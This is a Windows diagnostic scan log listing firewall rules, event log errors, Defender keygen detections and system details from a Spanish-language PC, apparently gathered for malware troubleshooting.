HKU\S-1-5-21-1103162910-2907697783-2557054662-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\flipp\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 200.52.196.196 - 189.194.232.137
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==
If an entry is included in the fixlist, it will be removed.
HKLM\...\StartupApproved\Run32: => "SecurityHealth"
HKU\S-1-5-21-1103162910-2907697783-2557054662-1001\...\StartupApproved\Run: => "OneDrive"

==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{8F46AF96-21AC-475B-8009-42D0DE211738}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe (McAfee, Inc.)
FirewallRules: [{1BD4F174-6002-4CDF-8E2C-EDD99D6CAFD5}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe (McAfee, Inc.)
FirewallRules: [{873EBAF5-B491-4F32-B7DA-DB931BE06BE2}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe (McAfee, Inc.)
FirewallRules: [{B6B07D60-3EAE-44B3-B58A-88E0DF51C38A}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe (Microsoft Corporation)
FirewallRules: [{BDED2249-D485-416F-86FC-A3990EBF31E2}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe (Microsoft Corporation)
FirewallRules: [{FEF8BF62-1E58-48B0-84D7-B6BB51A6D94D}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe (Microsoft Corporation)
FirewallRules: [{B9BC4698-EFCB-4C77-A9D8-6C5591F63BF6}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe (Microsoft Corporation)
FirewallRules: [{1AEA5389-DAE6-4870-AB81-91AE5C2416B8}] => (Allow) C:\Users\flipp\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.)
FirewallRules: [{87DBD563-1572-4033-9CA8-2D8D739FEA38}] => (Allow) C:\Users\flipp\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.)
FirewallRules: [{90C3923E-63D4-4D29-A010-5631B1C7C085}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
FirewallRules: [{E4572BCD-C372-4AC1-A96F-E0E026C3486F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc.)
FirewallRules: [{5B2534DB-2D12-466D-9200-8CF06988F2A8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc.)
FirewallRules: [{487DAD7F-7557-4109-A0F8-5C9EEB676F36}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc.)
FirewallRules: [{22887534-B78D-4692-9A24-B70E5ADFA6F4}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc.)
FirewallRules: [{A682D961-C24F-436A-AC92-4F934CFDE29A}] => (Allow) C:\Program Files (x86)\Anvsoft\Syncios\pdt_syncios.exe (Syncios Data Transfer)
FirewallRules: [{5244645C-AF55-4068-8718-491545A9790C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
FirewallRules: [{3165F10F-5D65-4726-8C4A-6D62718AEADF}] => (Allow) C:\Windows\SysWOW64\msiexec.exe (Microsoft Corporation)
FirewallRules: [{C6CAFD2B-28D2-4F66-BC0B-D15E7B1C6BEB}] => (Allow) C:\Windows\SysWOW64\NNbIJUy.exe (Microsoft Corporation)
FirewallRules: [{C4DAE771-4998-4897-BCF4-ACA7240C4AEF}] => (Allow) C:\Windows\EyIz.exe (Microsoft Corporation)
FirewallRules: [{AA15F3B4-89A9-42AB-9F78-75AD53CA8893}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{7A565219-7428-40B4-B8D7-D10291673C9E}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{81516910-F2CA-46D5-9F3C-35ACA08A6B54}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{9588838F-C213-40F9-BDA0-32CD22F3C152}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{AAFEE8A0-9DE0-4B3A-BB0E-2625C2FB52A1}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{5C66D66A-0384-4157-AC86-931AF59CD85A}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{2C5C9A69-C6F3-4001-B3D3-FC1A58A07230}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{BF490E95-D01B-4C85-B6F7-8245E695729E}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{DEF6E960-C88E-4486-B2D0-8FEE8EACFD29}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{109C42F4-F2E2-4CD9-A0A8-102E54E1F787}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{9CAD31AB-B272-448E-92A7-D7F9C891073F}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{7EF212BF-3A21-495E-B6FD-62F7CE8715EF}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{DF228F9E-A37D-4795-859E-1525A6C58B33}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{726CC30B-6FF4-4B98-87F8-0C3929EE2E2D}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{D61CD1E8-7CBD-4466-B6CC-CFB090A603A9}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{8BC88B2C-DF35-43DA-AA94-044A2D3C5840}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{DC91FF5E-1ED4-4178-8C93-13BC2D460185}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{C5D1CDE1-AB48-4830-9B27-46C20B0F54A4}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{A339E6CF-3B90-4E41-B586-F4F1833F0DFD}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{845B275E-F3F7-4CAB-8DCF-856C858ECA6B}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{2990E327-D13B-4F54-9766-C24B9411FF03}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{3AB5166C-70D0-4E7A-BD3D-F8BF560616FA}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{BF707289-2388-408D-AA5A-55F16B436104}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{A6D14054-D649-464D-8F0E-D77AF2DD7A10}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{D698664D-B605-4BAA-A0FC-693B4DA986EE}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{FD65BC3C-8C8D-4C22-9D99-612250B4D9CB}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{C07BE0B5-6443-47D3-BB5A-0BC0E3B03A64}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{954AB7A2-BC34-4F3C-8F99-EB0AD347B834}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{6AA8D199-6D3D-408E-BC06-CA2FE108BE81}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{7EFFC5B6-EE07-44A9-8D02-6284B2428E33}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{DDAB8BF1-DB86-444F-91D2-68485565AE07}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)
FirewallRules: [{BD54E6B9-6731-42FF-B99C-E27A14749B47}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)
FirewallRules: [{A9B653FB-5FC7-4275-AE4C-1FE50CE2DB95}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{FCF4C5DC-3831-4647-B1A1-8F295DC55187}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{11218C9B-F1DD-4200-B32B-672400D8DC1C}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{94ADFD97-9479-4FE6-B7E2-959CE40FF5E0}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{82275CE6-8FB5-4DD1-B5C3-F22D8B8D7700}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{231E83A8-9196-4646-B5D7-FEF1FEC8549F}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{F9EC0660-7207-44D1-BEB6-64DCBFA678CF}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{6D38D712-C6B0-4A11-A7B1-E4FF03E6EFC9}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{8DBF6A71-A60F-4D2A-A614-45A741DDDD78}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{670A2BCC-F551-4947-9074-668CA77B5163}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{F31EB53F-9B31-43A6-84E4-14E7CE6F1FA4}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{A3D29665-7B2E-411F-A1A0-24B01A1A3278}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{B9639ABD-B289-4D42-973A-A4A15D5F8ECD}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{0B401F7B-B768-412E-AF7F-612ED35DB550}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{9715FD71-D8E4-44DC-80B8-BDF3A72C5C53}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{34F61057-4CA5-4E7A-A9D0-7EB243100E2B}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{62BA119C-A0DD-481A-AC0E-98A0F3B5A764}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{4997D30E-D6DB-4694-A562-49C87F2B7FCC}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{24C35466-DE90-4E5F-A04A-48D61214759D}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Ltd)
FirewallRules: [{60283A9C-621E-4324-90A0-F917C6EF6D86}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Ltd)
FirewallRules: [{BE941A73-FDC4-4851-9E36-F06A35B92054}] => (Allow) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation)
FirewallRules: [{416BC277-EAE3-45A8-848F-BF76745353CC}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{81A1FE19-3607-4781-8C33-04CD799A9DE8}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{BBB9E90C-D91C-47CA-A850-EC43C44464B1}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{01F20083-42B1-45FD-8025-2B519E8FB5B2}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation)
FirewallRules: [{C4984B45-C90C-4EF3-B702-7B9A364E3490}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation)
FirewallRules: [{EA780E91-CEB3-4CAA-940A-2FA41F32CE64}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc.)

==================== Restore Points =========================

09-01-2019 12:57:33 Windows Update
16-01-2019 20:58:47 Windows Update
23-01-2019 21:25:29 Punto de control programado
30-01-2019 22:31:35 Windows Update

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (01/31/2019 12:08:05 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Local Hostname DESKTOP-95LCTQ8.local already in use; will try DESKTOP-95LCTQ8-2.local instead

Error: (01/31/2019 12:08:05 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: ProbeCount 0; will deregister 4 DESKTOP-95LCTQ8.local. Addr 192.168.0.4

Error: (01/31/2019 12:08:05 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.0.4:5353 16 DESKTOP-95LCTQ8.local.
AAAA 2806:0261:040D:90CF:0521:0033:E1DD:B459 Error: (01/31/2019 09:54:55 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nombre de la aplicación con errores: localNETService.exe, versión: 1.3.29.1, marca de tiempo: 0x5c00b61d Nombre del módulo con errores: WS2_32.dll, versión: 10.0.17134.1, marca de tiempo: 0x9898b9e1 Código de excepción: 0xc0000005 Desplazamiento de errores: 0x0001c117 Identificador del proceso con errores: 0xe6c Hora de inicio de la aplicación con errores: 0x01d4b97cfc17d2c0 Ruta de acceso de la aplicación con errores: C:\ProgramData\localNETService\localNETService.exe Ruta de acceso del módulo con errores: C:\Windows\System32\WS2_32.dll Identificador del informe: 21317bb6-6f9d-40cd-844b-5df095df7dcf Nombre completo del paquete con errores: Identificador de aplicación relativa del paquete con errores: Error: (01/30/2019 11:42:24 PM) (Source: MsiInstaller) (EventID: 11335) (User: DESKTOP-95LCTQ8) Description: Продукт: Microsoft.NET -- Ошибка 1335. Невозможно использовать необходимый для данной установки CAB-файл "Microsoft.NET.cab", поскольку он поврежден. Возможна ошибка сети, ошибка чтения с компакт-диска или ошибка пакета установки. Error: (01/30/2019 09:41:39 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Unexpected conflict discarding 25 1.0.0.127.in-addr.arpa. PTR DESKTOP-95LCTQ8-2.local. Error: (01/30/2019 09:41:39 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Received from 127.0.0.1:5353 23 1.0.0.127.in-addr.arpa. PTR DESKTOP-95LCTQ8.local. Error: (01/30/2019 09:41:39 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Unexpected conflict discarding 25 9.5.4.B.D.D.1.E.3.3.0.0.1.2.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.E.F.ip6.arpa. PTR DESKTOP-95LCTQ8-2.local. 
System errors: ============= Error: (01/31/2019 12:19:19 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: La configuración de permisos específico de la aplicación no concede el permiso Activación Local para la aplicación de servidor COM con CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} y APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} al usuario NT AUTHORITY\SERVICIO LOCAL con SID (S-1-5-19) en la dirección LocalHost (con LRPC) que se ejecuta en el contenedor de aplicaciones con SID No disponible (No disponible). Este permiso de seguridad se puede modificar mediante la herramienta administrativa Servicios de componentes. Error: (01/31/2019 12:08:19 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: La configuración de permisos específico de la aplicación no concede el permiso Activación Local para la aplicación de servidor COM con CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} y APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} al usuario NT AUTHORITY\SERVICIO LOCAL con SID (S-1-5-19) en la dirección LocalHost (con LRPC) que se ejecuta en el contenedor de aplicaciones con SID No disponible (No disponible). Este permiso de seguridad se puede modificar mediante la herramienta administrativa Servicios de componentes. Error: (01/31/2019 12:08:19 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: La configuración de permisos específico de la aplicación no concede el permiso Activación Local para la aplicación de servidor COM con CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} y APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} al usuario NT AUTHORITY\SERVICIO LOCAL con SID (S-1-5-19) en la dirección LocalHost (con LRPC) que se ejecuta en el contenedor de aplicaciones con SID No disponible (No disponible). Este permiso de seguridad se puede modificar mediante la herramienta administrativa Servicios de componentes. 
Error: (01/31/2019 12:07:05 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-95LCTQ8) Description: El servidor {4AA0A5C4-1B9B-4F2E-99D7-99C6AEC83474} no se registró con DCOM dentro del tiempo de espera requerido. Error: (01/31/2019 10:47:19 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: La configuración de permisos específico de la aplicación no concede el permiso Activación Local para la aplicación de servidor COM con CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} y APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} al usuario NT AUTHORITY\SERVICIO LOCAL con SID (S-1-5-19) en la dirección LocalHost (con LRPC) que se ejecuta en el contenedor de aplicaciones con SID No disponible (No disponible). Este permiso de seguridad se puede modificar mediante la herramienta administrativa Servicios de componentes. Error: (01/31/2019 10:03:11 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: La configuración de permisos específico de la aplicación no concede el permiso Activación Local para la aplicación de servidor COM con CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} y APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} al usuario NT AUTHORITY\SERVICIO LOCAL con SID (S-1-5-19) en la dirección LocalHost (con LRPC) que se ejecuta en el contenedor de aplicaciones con SID No disponible (No disponible). Este permiso de seguridad se puede modificar mediante la herramienta administrativa Servicios de componentes. Error: (01/31/2019 09:58:36 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: La configuración de permisos específico de la aplicación no concede el permiso Activación Local para la aplicación de servidor COM con CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} y APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} al usuario NT AUTHORITY\SERVICIO LOCAL con SID (S-1-5-19) en la dirección LocalHost (con LRPC) que se ejecuta en el contenedor de aplicaciones con SID No disponible (No disponible). 
Este permiso de seguridad se puede modificar mediante la herramienta administrativa Servicios de componentes. Error: (01/31/2019 09:55:00 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: El servicio localNETService se terminó de manera inesperada. Esto ha sucedido 1 veces. Windows Defender: =================================== Date: 2018-08-18 11:26:00.131 Description: Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado. Para obtener más información consulte lo siguiente: https://go.microsoft.com/fwlink/?linkid=37020&name=PUA:Win32/Keygen&threatid=225063&enterprise=0 Nombre: PUA:Win32/Keygen Id.: 225063 Gravedad: Grave Categoría: Software potencialmente no deseado Ruta de acceso: file:_C:\Users\flipp\AppData\Local\Temp\Rar$EXa1152.5132\WinRAR.v4.11_KEYGEN-FFF.exe; file:_C:\Users\flipp\AppData\Local\Temp\Rar$EXa7880.13126\WinRAR.v4.11_KEYGEN-FFF.exe; file:_C:\Users\flipp\AppData\Local\Temp\Rar$EXa8468.37683\WinRAR.v4.11_KEYGEN-FFF.exe Origen de detección: Equipo local Tipo de detección: Concreto Fuente de detección: Protección en tiempo real Usuario: DESKTOP-95LCTQ8\flipp Nombre de proceso: C:\Program Files\CCleaner\CCleaner64.exe Versión de firma: AV: 1.273.1622.0, AS: 1.273.1622.0, NIS: 1.273.1622.0 Versión de motor: AM: 1.1.15100.1, NIS: 1.1.15100.1 Date: 2018-08-18 11:25:59.717 Description: Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado. 
Para obtener más información consulte lo siguiente: https://go.microsoft.com/fwlink/?linkid=37020&name=PUA:Win32/Keygen&threatid=225063&enterprise=0 Nombre: PUA:Win32/Keygen Id.: 225063 Gravedad: Grave Categoría: Software potencialmente no deseado Ruta de acceso: file:_C:\Users\flipp\AppData\Local\Temp\Rar$EXa1152.5132\WinRAR.v4.11_KEYGEN-FFF.exe; file:_C:\Users\flipp\AppData\Local\Temp\Rar$EXa7880.13126\WinRAR.v4.11_KEYGEN-FFF.exe Origen de detección: Equipo local Tipo de detección: Concreto Fuente de detección: Protección en tiempo real Usuario: DESKTOP-95LCTQ8\flipp Nombre de proceso: C:\Program Files\CCleaner\CCleaner64.exe Versión de firma: AV: 1.273.1622.0, AS: 1.273.1622.0, NIS: 1.273.1622.0 Versión de motor: AM: 1.1.15100.1, NIS: 1.1.15100.1 Date: 2018-08-18 11:25:59.433 Description: Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado. Para obtener más información consulte lo siguiente: https://go.microsoft.com/fwlink/?linkid=37020&name=PUA:Win32/Keygen&threatid=225063&enterprise=0 Nombre: PUA:Win32/Keygen Id.: 225063 Gravedad: Grave Categoría: Software potencialmente no deseado Ruta de acceso: file:_C:\Users\flipp\AppData\Local\Temp\Rar$EXa1152.5132\WinRAR.v4.11_KEYGEN-FFF.exe Origen de detección: Equipo local Tipo de detección: Concreto Fuente de detección: Protección en tiempo real Usuario: DESKTOP-95LCTQ8\flipp Nombre de proceso: C:\Program Files\CCleaner\CCleaner64.exe Versión de firma: AV: 1.273.1622.0, AS: 1.273.1622.0, NIS: 1.273.1622.0 Versión de motor: AM: 1.1.15100.1, NIS: 1.1.15100.1 Date: 2018-08-16 14:30:46.717 Description: Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado. 
Para obtener más información consulte lo siguiente: https://go.microsoft.com/fwlink/?linkid=37020&name=PUA:Win32/Keygen&threatid=225063&enterprise=0 Nombre: PUA:Win32/Keygen Id.: 225063 Gravedad: Grave Categoría: Software potencialmente no deseado Ruta de acceso: file:_C:\Users\flipp\AppData\Local\Temp\Rar$EXa6828.2006\WinRAR.v4.11_KEYGEN-FFF.exe Origen de detección: Equipo local Tipo de detección: Concreto Fuente de detección: Protección en tiempo real Usuario: DESKTOP-95LCTQ8\flipp Nombre de proceso: C:\Program Files\WinRAR\WinRAR.exe Versión de firma: AV: 1.263.48.0, AS: 1.263.48.0, NIS: 1.263.48.0 Versión de motor: AM: 1.1.14600.4, NIS: 1.1.14600.4 CodeIntegrity: =================================== Date: 2019-01-31 13:17:00.568 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2019-01-31 13:17:00.564 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2019-01-31 13:16:48.604 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2019-01-31 13:16:48.572 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. 
Date: 2019-01-31 13:16:47.034 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2019-01-31 13:16:47.020 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2019-01-31 13:16:47.008 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2019-01-31 13:16:46.999 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. 
==================== Memory info ===========================

Processor: Intel(R) Core(TM) i3-4005U CPU @ 1.70GHz
Percentage of memory in use: 25%
Total physical RAM: 12203.99 MB
Available physical RAM: 9040.23 MB
Total Virtual: 14059.99 MB
Available Virtual: 11013.55 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:211 GB) (Free:141.71 GB) NTFS
Drive d: (Personal) (Fixed) (Total:166.02 GB) (Free:144.63 GB) NTFS
Drive e: (Escuela) (Fixed) (Total:80.1 GB) (Free:79.76 GB) NTFS

\\?\Volume{a24d1472-b6fc-4064-ba61-e8bcddbb4d17}\ (WINRETOOLS) (Fixed) (Total:0.73 GB) (Free:0.43 GB) NTFS
\\?\Volume{b361e1c9-f876-453a-a999-075e9e6ee981}\ () (Fixed) (Total:7.26 GB) (Free:6.22 GB) NTFS
\\?\Volume{ca8e9477-2a86-4e57-ab2c-1313b1d1c4ed}\ (ESP) (Fixed) (Total:0.48 GB) (Free:0.43 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 2FA6C01E)

Partition: GPT.

==================== End of Addition.txt ============================